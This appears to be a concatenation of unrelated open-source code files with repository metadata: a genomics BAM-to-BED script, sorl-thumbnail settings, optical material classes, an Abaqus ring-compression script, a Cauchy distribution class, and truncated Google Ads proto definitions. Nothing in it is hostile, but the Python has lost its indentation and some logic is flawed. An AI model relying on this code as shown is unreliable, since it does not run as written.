def intronCheck(geneID,coords):
### see if the coordinates are within a given intron
try:
for ic in introns[geneID]:
if withinQuery(ic,coords):
return True
except Exception:
pass
def withinQuery(ls1,ls2):
imax = max(ls1)
imin = min(ls1)
qmax = max(ls2)
qmin = min(ls2)
if qmin >= imin and qmax <= imax:
return True
else:
return False
### Compare the novel splice site locations in each gene
added=[]
for (chr,geneID,strand) in gene_organized:
gene_organized[(chr,geneID,strand)].sort()
if strand == '-':
gene_organized[(chr,geneID,strand)].reverse()
i=0
set = gene_organized[(chr,geneID,strand)]
for (pos1,pos2,type) in set:
k = [pos1,pos2]
annotation='novel'
if i==0 and type == 3:
if len(set)>1:
if set[i+1][-1]==5:
l = [set[i+1][0],pos1]
if (max(l)-min(l))<300 and intronCheck(geneID,l):
k=l
#print chr,k
annotation='novel-paired'
elif type == 5:
if set[i-1][-1]==3:
l = [set[i-1][0],pos1]
if (max(l)-min(l))<300 and intronCheck(geneID,l):
k=l
#print chr,k
annotation='novel-paired'
k.sort(); i+=1
if k not in added:
values = string.join([chr,str(k[0]),str(k[1]),geneID+':'+annotation,'',strand],'\t')+'\n'
added.append(k)
o.write(values)
o.close()
if __name__ == '__main__':
import multiprocessing as mlp
refExonCoordinateFile = ''
outputExonCoordinateRefBEDfile = ''
#bam_dir = "H9.102.2.6.bam"
#outputExonCoordinateRefBEDfile = 'H9.102.2.6__exon.bed'
################ Comand-line arguments ################
if len(sys.argv[1:])<=1: ### Indicates that there are insufficient number of command-line arguments
print "Warning! Please designate a directory containing BAM files as input in the command-line"
print "Example: python multiBAMtoBED.py --i /Users/me/BAMfiles --g /Users/me/ReferenceExonCoordinates/Hs_Ensembl_exon_hg19.txt --r /Users/me/ExonBEDRef/Hs_Ensembl_exon-cancer_hg19.bed --a exon --a junction --a reference"
print "Example: python multiBAMtoBED.py --i /Users/me/BAMfiles --a junction"
sys.exit()
else:
analysisType = []
useMultiProcessing=False
options, remainder = getopt.getopt(sys.argv[1:],'', ['i=','g=','r=','a=','m='])
for opt, arg in options:
if opt == '--i': bam_dir=arg
elif opt == '--g': refExonCoordinateFile=arg
elif opt == '--r': outputExonCoordinateRefBEDfile=arg
elif opt == '--a': analysisType.append(arg) ### options are: all, junction, exon, reference
elif opt == '--m': ### Run each BAM file on a different processor
if arg == 'yes': useMultiProcessing=True
elif arg == 'True': useMultiProcessing=True
else: useMultiProcessing=False
else:
print "Warning! Command-line argument: %s not recognized. Exiting..." % opt; sys.exit()
if len(analysisType) == 0 or 'all' in analysisType:
analysisType = ['exon','junction','reference']
try:
refExonCoordinateFile = refExonCoordinateFile
outputExonCoordinateRefBEDfile = outputExonCoordinateRefBEDfile
except Exception:
print 'Please provide a exon coordinate text file using the option --g and a output coordinate file path (--r) to generate exon.bed files'
analysisType = ['junction']
refExonCoordinateFile = ''
outputExonCoordinateRefBEDfile = ''
try: bam_dir = bam_dir
except Exception: print 'You must specify a directory of BAM files or a single bam file with --i';sys.exit()
try: refExonCoordinateFile = refExonCoordinateFile
except Exception: print 'You must specify a AltAnalyze exon coordinate text file with --g';sys.exit()
try: outputExonCoordinateRefBEDfile = outputExonCoordinateRefBEDfile
except Exception: print 'You must specify an output path for the exon.bed reference file location with --r (e.g., --r /users/Hs_exon.bed)';sys.exit()
parallelBAMProcessing(bam_dir,refExonCoordinateFile,outputExonCoordinateRefBEDfile,analysisType=analysisType,useMultiProcessing=useMultiProcessing,MLP=mlp)
|
nsalomonis/AltAnalyze
|
import_scripts/multiBAMtoBED.py
|
Python
|
apache-2.0
| 19,538
|
[
"pysam"
] |
5449b8e1f11c67316c6ed291ef6083744d5e622f8679005fb0d7259ce8836c18
|
from django.conf import settings
# When True ThumbnailNode.render can raise errors
THUMBNAIL_DEBUG = False
# Backend
THUMBNAIL_BACKEND = 'sorl.thumbnail.base.ThumbnailBackend'
# Key-value store, ships with:
# sorl.thumbnail.kvstores.cached_db_kvstore.KVStore
# sorl.thumbnail.kvstores.redis_kvstore.KVStore
# Redis requires some more work, see docs
THUMBNAIL_KVSTORE = 'sorl.thumbnail.kvstores.cached_db_kvstore.KVStore'
# Change this to something else for MSSQL
THUMBNAIL_KEY_DBCOLUMN = 'key'
# Engine, ships with:
# sorl.thumbnail.engines.convert_engine.Engine
# sorl.thumbnail.engines.pil_engine.Engine
# sorl.thumbnail.engines.pgmagick_engine.Engine
# convert is preferred but requires imagemagick or graphicsmagick, se docs
THUMBNAIL_ENGINE = 'sorl.thumbnail.engines.pil_engine.Engine'
# Path to Imagemagick or Graphicsmagick ``convert`` and ``identify``.
THUMBNAIL_CONVERT = 'convert'
THUMBNAIL_IDENTIFY = 'identify'
# Storage for the generated thumbnails
THUMBNAIL_STORAGE = settings.DEFAULT_FILE_STORAGE
# Redis settings
THUMBNAIL_REDIS_DB = 0
THUMBNAIL_REDIS_PASSWORD = ''
THUMBNAIL_REDIS_HOST = 'localhost'
THUMBNAIL_REDIS_PORT = 6379
THUMBNAIL_REDIS_UNIX_SOCKET_PATH = None
# DBM settings
THUMBNAIL_DBM_FILE = "thumbnail_kvstore"
THUMBNAIL_DBM_MODE = 0o644
# Cache timeout for ``cached_db`` store. You should probably keep this at
# maximum or ``0`` if your caching backend can handle that as infinate.
THUMBNAIL_CACHE_TIMEOUT = 3600 * 24 * 365 * 10 # 10 years
# The cache configuration to use for storing thumbnail data
THUMBNAIL_CACHE = 'default'
# Key prefix used by the key value store
THUMBNAIL_KEY_PREFIX = 'sorl-thumbnail'
# Thumbnail filename prefix
THUMBNAIL_PREFIX = 'cache/'
# Image format, common formats are: JPEG, PNG
# Make sure the backend can handle the format you specify
THUMBNAIL_FORMAT = 'JPEG'
THUMBNAIL_PRESERVE_FORMAT = False
# Colorspace, backends are required to implement: RGB, GRAY
# Setting this to None will keep the original colorspace.
THUMBNAIL_COLORSPACE = 'RGB'
# Should we upscale images by default
THUMBNAIL_UPSCALE = True
# Quality, 0-100
THUMBNAIL_QUALITY = 95
# Gaussian blur radius
THUMBNAIL_BLUR = 0
# Adds padding around the image to match the requested size without cropping
THUMBNAIL_PADDING = False
THUMBNAIL_PADDING_COLOR = '#ffffff'
# Save as progressive when saving as jpeg
THUMBNAIL_PROGRESSIVE = True
# Orientate the thumbnail with respect to source EXIF orientation tag
THUMBNAIL_ORIENTATION = True
# This means sorl.thumbnail will generate and serve a generated dummy image
# regardless of the thumbnail source content
THUMBNAIL_DUMMY = False
# Thumbnail dummy (placeholder) source. Some you might try are:
# http://placekitten.com/%(width)s/%(height)s
# http://placekitten.com/g/%(width)s/%(height)s
# http://placehold.it/%(width)sx%(height)s
THUMBNAIL_DUMMY_SOURCE = 'http://dummyimage.com/%(width)sx%(height)s'
# Sets the source image ratio for dummy generation of images with only width
# or height given
THUMBNAIL_DUMMY_RATIO = 1.5
# Enables creation of multiple-resolution (aka "Retina") images.
# We don't create retina images by default to optimize performance.
THUMBNAIL_ALTERNATIVE_RESOLUTIONS = []
# Lazy fill empty thumbnail like THUMBNAIL_DUMMY
THUMBNAIL_LAZY_FILL_EMPTY = False
# Timeout, in seconds, to use when retrieving images with urllib2
THUMBNAIL_URL_TIMEOUT = None
# Default width when using filters for texts
THUMBNAIL_FILTER_WIDTH = 500
# Should we flatten images by default (fixes a lot of transparency issues with
# imagemagick)
THUMBNAIL_FLATTEN = False
|
seedinvest/sorl-thumbnail
|
sorl/thumbnail/conf/defaults.py
|
Python
|
bsd-3-clause
| 3,576
|
[
"Gaussian"
] |
ad92315694e0ad97a0ce1edba1315d29124b0b475beaa01827f27459d1f2a9bd
|
# pylint: disable=W0622,R0903,R0902,R0913,W0633
"""Functions and objects to manipulate materials.
A material is an object with a refractive index function.
"""
from builtins import str
from builtins import object
from functools import partial
import numpy
from scipy.integrate import quad
from EMpy.constants import eps0
__author__ = 'Lorenzo Bolla'
class Material(object):
"""Generic class to handle materials.
This class is intended to be subclassed to obtain isotropic and
anisotropic materials.
"""
def __init__(self, name=''):
"""Set material name."""
self.name = name
class RefractiveIndex(object):
"""Refractive Index.
Unaware of temperature.
Parameters
----------
Provide ONE of the following named-arguments:
n0_const : float
A single-value of refractive index, to be used regardless of
the wavelength requested.
For example:
>>> n0_const = 1.448 for SiO2
n0_poly : list/tuple
Use a polynomial rix dispersion function: provide the
polynomial coefficients to be evaluated by numpy.polyval.
# sets the refractive index function as n = 9(wl**3) +
# 5(wl**2) + 3(wl) + 1
For example:
>>> n0_poly = (9,5,3,1)
n0_smcoeffs (Sellmeier coefficients): 6-element list/tuple
Set the rix dispersion function to the 6-parameter Sellmeier
function as so:
n(wls) = sqrt(1. +
B1 * wls ** 2 / (wls ** 2 - C1) +
B2 * wls ** 2 / (wls ** 2 - C2) +
B3 * wls ** 2 / (wls ** 2 - C3))
For example:
>>> n0_smcoeffs = [B1, B2, B3, C1, C2, C3] # six values total
n0_func : function
Provide an arbitrary function to return the refractive index
versus wavelength.
For example:
>>> def SiN_func(wl):
>>> x = wl * 1e6 # convert to microns
>>> return 1.887 + 0.01929/x**2 + 1.6662e-4/x**4 # Cauchy func
>>> SiN_rix = RefractiveIndex(n0_func=SiN_func)
or
>>> SiN_rix = RefractiveIndex(
n0_func=lambda wl: 1.887 + 0.01929/(wl*1e6)**2 +
1.6662e-4/(wl*1e6)**4)
Your function should return a `numpy.array`, since it will be
passed a `numpy.array` of the wavelengths requested. This
conversion to `array` happens automatically if your function
does math on the wavelength.
n0_known : dictionary
Use if RefractiveIndex will only be evaluated at a specific set of `wls`.
n0_known should be a dictionary of `key:value` pairs
corresponding to `wavelength:rix`, for example:
>>> n0_known = { 1500e-9:1.445, 1550e-9:1.446, 1600e-9:1.447 }
"""
def __init__(self, n0_const=None, n0_poly=None, n0_smcoeffs=None,
n0_known=None, n0_func=None):
if n0_const is not None:
self.get_rix = partial(self.__from_const, n0_const)
elif n0_poly is not None:
self.get_rix = partial(self.__from_poly, n0_poly)
elif n0_smcoeffs is not None:
self.get_rix = partial(self.__from_sellmeier, n0_smcoeffs)
elif n0_func is not None:
self.get_rix = partial(self.__from_function, n0_func)
elif n0_known is not None:
self.get_rix = partial(self.__from_known, n0_known)
else:
raise ValueError('Please provide at least one parameter.')
@staticmethod
def __from_const(n0, wls):
wls = numpy.atleast_1d(wls)
return n0 * numpy.ones_like(wls)
@staticmethod
def __from_poly(n0_poly, wls):
wls = numpy.atleast_1d(wls)
return numpy.polyval(n0_poly, wls) * numpy.ones_like(wls)
@staticmethod
def __from_sellmeier(n0_smcoeffs, wls):
wls = numpy.atleast_1d(wls)
B1, B2, B3, C1, C2, C3 = n0_smcoeffs
return numpy.sqrt(
1. +
B1 * wls ** 2 / (wls ** 2 - C1) +
B2 * wls ** 2 / (wls ** 2 - C2) +
B3 * wls ** 2 / (wls ** 2 - C3)
) * numpy.ones_like(wls)
@staticmethod
def __from_function(n0_func, wls):
# ensure wls is array
wls = numpy.atleast_1d(wls)
return n0_func(wls) * numpy.ones_like(wls)
@staticmethod
def __from_known(n0_known, wls):
wls = numpy.atleast_1d(wls)
# Note: we should interpolate...
return numpy.array([n0_known.get(wl, 0) for wl in wls])
def __call__(self, wls):
return self.get_rix(wls)
class ThermalOpticCoefficient(object):
"""Thermal Optic Coefficient."""
def __init__(self, data=None, T0=300):
self.__data = data
self.T0 = T0
def TOC(self, T):
if self.__data is not None:
return numpy.polyval(self.__data, T)
else:
return 0.0
def __call__(self, T):
return self.TOC(T)
def dnT(self, T):
"""Integrate the TOC to get the rix variation."""
return quad(self.TOC, self.T0, T)[0]
class IsotropicMaterial(Material):
"""Subclasses Material to describe isotropic materials.
Frequency dispersion and thermic aware.
In all the member functions, wls must be an ndarray.
"""
def __init__(self, name='', n0=RefractiveIndex(n0_const=1.),
toc=ThermalOpticCoefficient()):
"""Set name, default temperature, refractive index and TOC
(thermal optic coefficient)."""
Material.__init__(self, name)
self.n0 = n0
self.toc = toc
def n(self, wls, T=None):
"""Return the refractive index at T as a [1 x wls] array."""
if T is None:
T = self.toc.T0
return self.n0(wls) + self.toc.dnT(T)
def epsilon(self, wls, T=None):
"""Return the epsilon at T as a [1 x wls] array."""
if T is None:
T = self.toc.T0
return self.n(wls, T) ** 2 * eps0
def epsilonTensor(self, wls, T=None):
"""Return the epsilon at T as a [3 x 3 x wls] array."""
if T is None:
T = self.toc.T0
tmp = numpy.eye(3)
return tmp[:, :, numpy.newaxis] * self.epsilon(wls, T)
@staticmethod
def isIsotropic():
"""Return True, because the material is isotropic."""
return True
def __str__(self):
"""Return material name."""
return self.name + ', isotropic'
class EpsilonTensor(object):
def __init__(self, epsilon_tensor_const=eps0 * numpy.eye(3),
epsilon_tensor_known=None):
if epsilon_tensor_known is None:
epsilon_tensor_known = {}
self.epsilon_tensor_const = epsilon_tensor_const
self.epsilon_tensor_known = epsilon_tensor_known
def __call__(self, wls):
"""Return the epsilon tensor as a [3 x 3 x wls.size] matrix."""
wls = numpy.atleast_1d(wls)
if wls.size == 1:
if wls.item() in self.epsilon_tensor_known:
return self.epsilon_tensor_known[
wls.item()][:, :, numpy.newaxis]
return self.epsilon_tensor_const[
:, :, numpy.newaxis] * numpy.ones_like(wls)
class AnisotropicMaterial(Material):
"""Subclass Material to describe anisotropic materials.
No frequency dispersion nor thermic aware.
In all the member functions, wls must be an ndarray.
"""
def __init__(self, name='', epsilon_tensor=EpsilonTensor()):
"""Set name and default epsilon tensor."""
Material.__init__(self, name)
self.epsilonTensor = epsilon_tensor
@staticmethod
def isIsotropic():
"""Return False, because the material is anisotropic."""
return False
def __str__(self):
"""Return material name."""
return self.name + ', anisotropic'
# Vacuum
Vacuum = IsotropicMaterial(name='Vacuum')
# Air
Air = IsotropicMaterial(name='Air')
# Silicon
Si = IsotropicMaterial(
name='Silicon',
n0=RefractiveIndex(
n0_poly=(0.076006e12, -0.31547e6, 3.783)),
toc=ThermalOpticCoefficient((-1.49e-10, 3.47e-7, 9.48e-5)))
# SiO2
SiO2 = IsotropicMaterial(
name='Silica',
n0=RefractiveIndex(n0_const=1.446),
toc=ThermalOpticCoefficient((1.1e-4,)))
# BK7 glass (see http://en.wikipedia.org/wiki/Sellmeier_equation)
BK7 = IsotropicMaterial(
name='Borosilicate crown glass',
n0=RefractiveIndex(n0_smcoeffs=(
1.03961212, 2.31792344e-1, 1.01046945, 6.00069867e-15, 2.00179144e-14,
1.03560653e-10)))
class LiquidCrystal(Material):
"""Liquid Crystal.
A liquid crystal is determined by it ordinary and extraordinary
refractive indices, its elastic tensor and its chirality.
Inspiration here:
U{http://www.ee.ucl.ac.uk/~rjames/modelling/constant-order/oned/}.
@ivar name: Liquid Crystal name.
@ivar nO: Ordinary refractive index.
@ivar nE: Extraordinary refractive index.
@ivar K11: Elastic tensor, first component.
@ivar K22: Elastic tensor, second component.
@ivar K33: Elastic tensor, third component.
@ivar q0: Chirality.
"""
def __init__(self, name='', nO=1., nE=1., nO_electrical=1.,
nE_electrical=1., K11=0.0, K22=0.0, K33=0.0, q0=0.0):
"""Set name, the refractive indices, the elastic constants and
the chirality."""
Material.__init__(self, name)
self.nO = nO
self.nE = nE
self.nO_electrical = nO_electrical
self.nE_electrical = nE_electrical
self.K11 = K11
self.K22 = K22
self.K33 = K33
self.q0 = q0
self.epslow = self.nO_electrical ** 2
self.deleps = self.nE_electrical ** 2 - self.epslow
def get_10400_000_100(conc000):
"""Return a LiquidCrystal made of conc% 000 and (100-conc)% 100."""
conc = [0, 100]
epsO_electrical = [3.38, 3.28]
epsE_electrical = [5.567, 5.867]
epsO = [1.47551 ** 2, 1.46922 ** 2]
epsE = [1.61300 ** 2, 1.57016 ** 2]
K11 = 13.5e-12 # elastic constant [N] (splay)
K22 = 6.5e-12 # elastic constant [N] (twist)
K33 = 20e-12 # elastic constant [N] (bend)
q0 = 0 # chirality 2*pi/pitch
nO_electrical_ = numpy.interp(conc000, conc, epsO_electrical) ** .5
nE_electrical_ = numpy.interp(conc000, conc, epsE_electrical) ** .5
nO_ = numpy.interp(conc000, conc, epsO) ** .5
nE_ = numpy.interp(conc000, conc, epsE) ** .5
return LiquidCrystal(
'10400_000_100_' + str(conc000) + '_' + str(100 - conc000),
nO_, nE_, nO_electrical_, nE_electrical_,
K11, K22, K33, q0)
|
DanHickstein/EMpy
|
EMpy/materials.py
|
Python
|
mit
| 10,629
|
[
"CRYSTAL"
] |
8bbbfcf8b6162e877b55b4089438c628fd8e30aeef6b7da6951fdb247eb66762
|
from compmod.models import RingCompression
from abapy import materials
from abapy.misc import load
from abapy.postproc import FieldOutput
import matplotlib.pyplot as plt
import numpy as np
import pickle, copy
import platform
from scipy import interpolate
#PAREMETERS
is_3D = True
inner_radius, outer_radius = 30 , 40
Nt, Nr, Na = 10, 5, 2
Ne = Nt * Nr * Na
displacement = 5.
nFrames = 100
Nseed = 400 # Number of grain seeds
sigma_0_hp = .001
k_hp = .001
nu = 0.3
n = 0.001
E = 1.
thickness =10.
workdir = "workdir/"
label = "ringCompression_voronoi"
elType = "C3D8"
cpus = 1
node = platform.node()
if node == 'lcharleux': abqlauncher = '/opt/Abaqus/6.9/Commands/abaqus' # Ludovic
if node == 'serv2-ms-symme': abqlauncher = '/opt/abaqus/Commands/abaqus' # Linux
if node == 'epua-pd47':
abqlauncher = 'C:/SIMULIA/Abaqus/6.11-2/exec/abq6112.exe' # Local machine configuration
if node == 'SERV3-MS-SYMME':
abqlauncher = '"C:/Program Files (x86)/SIMULIA/Abaqus/6.11-2/exec/abq6112.exe"' # Local machine configuration
if node == 'epua-pd45':
abqlauncher = 'C:\SIMULIA/Abaqus/Commands/abaqus'
#TASKS
Run_simu = True
#MODEL DEFINITION
disp = displacement/2.
model = RingCompression(
inner_radius = inner_radius,
outer_radius = outer_radius,
disp = disp,
thickness = thickness,
nFrames = nFrames,
Nr = Nr,
Nt = Nt,
Na = Na,
workdir = workdir,
label = label,
elType = elType,
abqlauncher = abqlauncher,
cpus = cpus,
is_3D = is_3D,
compart = True)
# SIMULATION
model.MakeMesh()
mesh = model.mesh
centroids = mesh.centroids()
nodes = mesh.nodes
nodes_postion = np.array([nodes.x, nodes.y, nodes.z]).transpose()
conn = np.array(mesh.connectivity)
labels = nodes.labels
# VORONOI CELL BUILDING
# Bounding box
xmin, xmax = nodes_postion[:,0].min(), nodes_postion[:,0].max()
ymin, ymax = nodes_postion[:,1].min(), nodes_postion[:,1].max()
zmin, zmax = nodes_postion[:,2].min(), nodes_postion[:,2].max()
# Seeds
seeds = np.random.rand(Nseed,3) * np.array([[xmax - xmin, ymax -ymin, zmax - zmin]]) + np.array([[xmin, ymin, zmin]])
seed_flags = np.arange(Nseed)
elem_flags = interpolate.griddata(seeds, seed_flags, centroids, method = "nearest")
# Volumes and dimensions
elem_volume = mesh.volume()
grain_volume = np.zeros(len(seed_flags))
for i in xrange(len(seed_flags)):
flag = seed_flags[i]
grain_volume[i] = ((elem_flags == flag) * elem_volume).sum()
grain_diameter = (grain_volume * 6./np.pi)**(1. / 3.)
elem_grain_diameter = grain_diameter[elem_flags]
# Hall-Petch (not mandatory)
sy = sigma_0_hp + k_hp / elem_grain_diameter**.5
E = E * np.ones(Ne) # Young's modulus
nu = nu * np.ones(Ne) # Poisson's ratio
n = n * np.ones(Ne)
labels = ['mat_{0}'.format(i+1) for i in xrange(len(sy))]
material = [materials.Bilinear(labels = labels[i],E = E[i], nu = nu[i], n = n[i],sy = sy[i]) for i in xrange(Ne)]
model.material = material
sy_field = FieldOutput(labels = mesh.labels, data = sy, position = "element")
if Run_simu:
model.MakeInp()
model.Run()
model.MakePostProc()
model.RunPostProc()
else:
model.LoadResults()
# Plotting results
if model.outputs['completed']:
U = model.outputs['field']['U'][0]
mesh.nodes.apply_displacement(U)
f = open(label + ".vtk", "w")
f.write(mesh.dump2vtk())
f.write(sy_field.dump2vtk(name = "Yield_Stress"))
f.write( model.outputs['field']['S'][0].vonmises().dump2vtk(name = "Von_Mises_Stress"))
f.close()
# History Outputs
force = -2. * model.outputs['history']['force']
disp = -2. * model.outputs['history']['disp']
fig = plt.figure(0)
plt.clf()
sp1 = fig.add_subplot(1, 1, 1)
plt.plot(disp.data[0], force.data[0], 'ro-', label = 'Loading', linewidth = 2.)
plt.plot(disp.data[1], force.data[1], 'bv-', label = 'Unloading', linewidth = 2.)
plt.legend(loc="upper left")
plt.xlabel('Displacement, $U$')
plt.ylabel('Force, $F$')
plt.grid()
plt.savefig(workdir + label + 'history.pdf')
|
lcharleux/compmod
|
doc/sandbox/laurent/ring_compression_voronoi.py
|
Python
|
gpl-2.0
| 3,955
|
[
"VTK"
] |
458cdccec0e8ead58e791a92932d9229ef542946f99a321c6ee149022e656fc1
|
"""The Cauchy distribution."""
from equadratures.distributions.template import Distribution
from equadratures.distributions.recurrence_utils import custom_recurrence_coefficients
import numpy as np
from scipy.stats import cauchy
RECURRENCE_PDF_SAMPLES = 8000
class Cauchy(Distribution):
"""
The class defines a Cauchy object. It is the child of Distribution.
:param double location:
Location parameter of the Cauchy distribution.
:param double scale:
Scale parameter of the Cauchy distribution.
"""
def __init__(self, location=None, scale=None):
self.location = location
self.scale = scale
self.bounds = np.array([-np.inf, np.inf])
self.skewness = np.nan
self.kurtosis = np.nan
if self.scale is not None:
self.x_range_for_pdf = np.linspace(-15*self.scale, 15*self.scale, RECURRENCE_PDF_SAMPLES)
self.parent = cauchy(loc=self.location, scale=self.scale)
self.mean = np.mean(self.get_samples(m=1000))
self.variance = np.var(self.get_samples(m=1000))
def get_description(self):
"""
A description of the Cauchy distribution.
:param Cauchy self:
An instance of the Cauchy class.
:return:
A string describing the Cauchy distribution.
"""
text = "is a Cauchy distribution that by definition has an undefined mean and variance; its location parameter is "+str(self.location)+", and its scale parameter is "+str(self.scale)+"."
return text
def get_pdf(self, points=None):
"""
A Cauchy probability density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array points:
Array of points for defining the probability density function.
:return:
An array of N values over the support of the distribution.
:return:
Probability density values along the support of the Cauchy distribution.
"""
if points is not None:
return self.parent.pdf(points)
else:
raise(ValueError, 'Please digit an input for getPDF method')
def get_cdf(self, points=None):
"""
A Cauchy cumulative density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array points:
Array of points for defining the cumulative density function.
:return:
An array of N equidistant values over the support of the distribution.
:return:
Cumulative density values along the support of the Cauchy distribution.
"""
if points is not None:
return self.parent.cdf(points)
else:
raise(ValueError, 'Please digit an input for getCDF method')
def get_icdf(self, xx):
"""
An inverse Cauchy cumulative density function.
:param Cauchy self:
An instance of the Cauchy class.
:param array xx:
A numpy array of uniformly distributed samples between [0, 1].
:return:
Inverse CDF samples associated with the Cauchy distribution.
"""
return self.parent.ppf(xx)
def get_samples(self, m):
"""
Generates samples from the Gaussian distribution.
:param Gaussian self:
An instance of the Gaussian class.
:param integer m:
Number of random samples. If no value is provided, a default of 5e5 is assumed.
:return:
A N-by-1 vector that contains the samples.
"""
if m is not None:
number = m
else:
number = 500000
return self.parent.rvs(size=number)
|
psesh/Effective-Quadratures
|
equadratures/distributions/cauchy.py
|
Python
|
mit
| 3,749
|
[
"Gaussian"
] |
f9231f292d54b10b2c1d15fed83182d1caa172191172ff4cec56982073b958be
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v9.enums.types import customer_match_upload_key_type
from google.ads.googleads.v9.enums.types import user_list_combined_rule_operator
from google.ads.googleads.v9.enums.types import user_list_crm_data_source_type
from google.ads.googleads.v9.enums.types import (
user_list_date_rule_item_operator,
)
from google.ads.googleads.v9.enums.types import user_list_logical_rule_operator
from google.ads.googleads.v9.enums.types import (
user_list_number_rule_item_operator,
)
from google.ads.googleads.v9.enums.types import user_list_prepopulation_status
from google.ads.googleads.v9.enums.types import user_list_rule_type
from google.ads.googleads.v9.enums.types import (
user_list_string_rule_item_operator,
)
__protobuf__ = proto.module(
package="google.ads.googleads.v9.common",
marshal="google.ads.googleads.v9",
manifest={
"SimilarUserListInfo",
"CrmBasedUserListInfo",
"UserListRuleInfo",
"UserListRuleItemGroupInfo",
"UserListRuleItemInfo",
"UserListDateRuleItemInfo",
"UserListNumberRuleItemInfo",
"UserListStringRuleItemInfo",
"CombinedRuleUserListInfo",
"DateSpecificRuleUserListInfo",
"ExpressionRuleUserListInfo",
"RuleBasedUserListInfo",
"LogicalUserListInfo",
"UserListLogicalRuleInfo",
"LogicalUserListOperandInfo",
"BasicUserListInfo",
"UserListActionInfo",
},
)
class SimilarUserListInfo(proto.Message):
r"""SimilarUserList is a list of users which are similar to users
from another UserList. These lists are read-only and
automatically created by Google.
Attributes:
seed_user_list (str):
Seed UserList from which this list is
derived.
This field is a member of `oneof`_ ``_seed_user_list``.
"""
seed_user_list = proto.Field(proto.STRING, number=2, optional=True,)
class CrmBasedUserListInfo(proto.Message):
r"""UserList of CRM users provided by the advertiser.
Attributes:
app_id (str):
A string that uniquely identifies a mobile
application from which the data was collected.
For iOS, the ID string is the 9 digit string
that appears at the end of an App Store URL
(e.g., "476943146" for "Flood-It! 2" whose App
Store link is
http://itunes.apple.com/us/app/flood-
it!-2/id476943146). For Android, the ID string
is the application's package name (e.g.,
"com.labpixies.colordrips" for "Color Drips"
given Google Play link
https://play.google.com/store/apps/details?id=com.labpixies.colordrips).
Required when creating CrmBasedUserList for
uploading mobile advertising IDs.
This field is a member of `oneof`_ ``_app_id``.
upload_key_type (google.ads.googleads.v9.enums.types.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType):
Matching key type of the list.
Mixed data types are not allowed on the same
list. This field is required for an ADD
operation.
data_source_type (google.ads.googleads.v9.enums.types.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType):
Data source of the list. Default value is FIRST_PARTY. Only
customers on the allow-list can create third-party sourced
CRM lists.
"""
app_id = proto.Field(proto.STRING, number=4, optional=True,)
upload_key_type = proto.Field(
proto.ENUM,
number=2,
enum=customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType,
)
data_source_type = proto.Field(
proto.ENUM,
number=3,
enum=user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType,
)
class UserListRuleInfo(proto.Message):
r"""A client defined rule based on custom parameters sent by web
sites or uploaded by the advertiser.
Attributes:
rule_type (google.ads.googleads.v9.enums.types.UserListRuleTypeEnum.UserListRuleType):
Rule type is used to determine how to group
rule items.
The default is OR of ANDs (disjunctive normal
form). That is, rule items will be ANDed
together within rule item groups and the groups
themselves will be ORed together.
Currently AND of ORs (conjunctive normal form)
is only supported for ExpressionRuleUserList.
rule_item_groups (Sequence[google.ads.googleads.v9.common.types.UserListRuleItemGroupInfo]):
List of rule item groups that defines this rule. Rule item
groups are grouped together based on rule_type.
"""
rule_type = proto.Field(
proto.ENUM,
number=1,
enum=user_list_rule_type.UserListRuleTypeEnum.UserListRuleType,
)
rule_item_groups = proto.RepeatedField(
proto.MESSAGE, number=2, message="UserListRuleItemGroupInfo",
)
class UserListRuleItemGroupInfo(proto.Message):
r"""A group of rule items.
Attributes:
rule_items (Sequence[google.ads.googleads.v9.common.types.UserListRuleItemInfo]):
Rule items that will be grouped together based on rule_type.
"""
rule_items = proto.RepeatedField(
proto.MESSAGE, number=1, message="UserListRuleItemInfo",
)
class UserListRuleItemInfo(proto.Message):
r"""An atomic rule item.
This message has `oneof`_ fields (mutually exclusive fields).
For each oneof, at most one member field can be set at the same time.
Setting any member of the oneof automatically clears all other
members.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
name (str):
Rule variable name. It should match the corresponding key
name fired by the pixel. A name must begin with US-ascii
letters or underscore or UTF8 code that is greater than 127
and consist of US-ascii letters or digits or underscore or
UTF8 code that is greater than 127. For websites, there are
two built-in variable URL (name = 'url__') and referrer URL
(name = 'ref_url__'). This field must be populated when
creating a new rule item.
This field is a member of `oneof`_ ``_name``.
number_rule_item (google.ads.googleads.v9.common.types.UserListNumberRuleItemInfo):
An atomic rule item composed of a number
operation.
This field is a member of `oneof`_ ``rule_item``.
string_rule_item (google.ads.googleads.v9.common.types.UserListStringRuleItemInfo):
An atomic rule item composed of a string
operation.
This field is a member of `oneof`_ ``rule_item``.
date_rule_item (google.ads.googleads.v9.common.types.UserListDateRuleItemInfo):
An atomic rule item composed of a date
operation.
This field is a member of `oneof`_ ``rule_item``.
"""
name = proto.Field(proto.STRING, number=5, optional=True,)
number_rule_item = proto.Field(
proto.MESSAGE,
number=2,
oneof="rule_item",
message="UserListNumberRuleItemInfo",
)
string_rule_item = proto.Field(
proto.MESSAGE,
number=3,
oneof="rule_item",
message="UserListStringRuleItemInfo",
)
date_rule_item = proto.Field(
proto.MESSAGE,
number=4,
oneof="rule_item",
message="UserListDateRuleItemInfo",
)
class UserListDateRuleItemInfo(proto.Message):
r"""A rule item composed of a date operation.
Attributes:
operator (google.ads.googleads.v9.enums.types.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator):
Date comparison operator.
This field is required and must be populated
when creating new date rule item.
value (str):
String representing date value to be compared
with the rule variable. Supported date format is
YYYY-MM-DD. Times are reported in the customer's
time zone.
This field is a member of `oneof`_ ``_value``.
offset_in_days (int):
The relative date value of the right hand
side denoted by number of days offset from now.
The value field will override this field when
both are present.
This field is a member of `oneof`_ ``_offset_in_days``.
"""
operator = proto.Field(
proto.ENUM,
number=1,
